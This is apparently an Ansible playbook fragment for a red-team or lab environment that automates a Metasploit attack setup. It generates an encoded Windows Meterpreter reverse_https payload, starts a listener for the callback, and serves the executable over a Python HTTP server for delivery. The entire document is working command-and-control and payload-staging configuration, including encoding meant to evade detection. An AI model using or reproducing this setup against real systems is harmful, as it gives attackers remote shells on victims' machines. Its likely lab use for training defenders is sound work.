- name: Create folder to host payload
  ansible.builtin.file:
    path: /home/red/payload
    owner: red
    group: red
    state: directory

- name: Create Metasploit Resource Script
  copy:
    dest: "/home/red/https-handler.rc"
    content: |
      use payload/windows/x64/meterpreter/reverse_https
      set lhost {{red_ip}}
      set lport 443
      set luri /session-id
      generate -f exe -e x64/zutto_dekiru -o /home/red/payload/{{red_executable}}
      use exploit/multi/handler
      set payload windows/x64/meterpreter/reverse_https
      set lhost {{red_ip}}
      set lport 443
      set luri /session-id/
      exploit -j

- name: Create Bash Launcher Script
  copy:
    dest: "/home/red/launch.sh"
    mode: 0755
    content: |
      #!/bin/bash
      nohup tmux new-session -d -s msf msfconsole -r /home/red/https-handler.rc &
      cd /home/red/payload
      nohup tmux new-session -d -s server python -m http.server 8080 &
      echo "action complete."

- name: Execute Metasploit and run script
  ansible.builtin.shell: cd /home/red/ && ./launch.sh

- name: Wait for python to serve file
  uri:
    url: http://{{red_ip}}:8080/{{red_executable}}
    method: GET
    status_code: 200
    return_content: no
  register: result
  until: result.status == 200
  retries: 30
  delay: 5
    
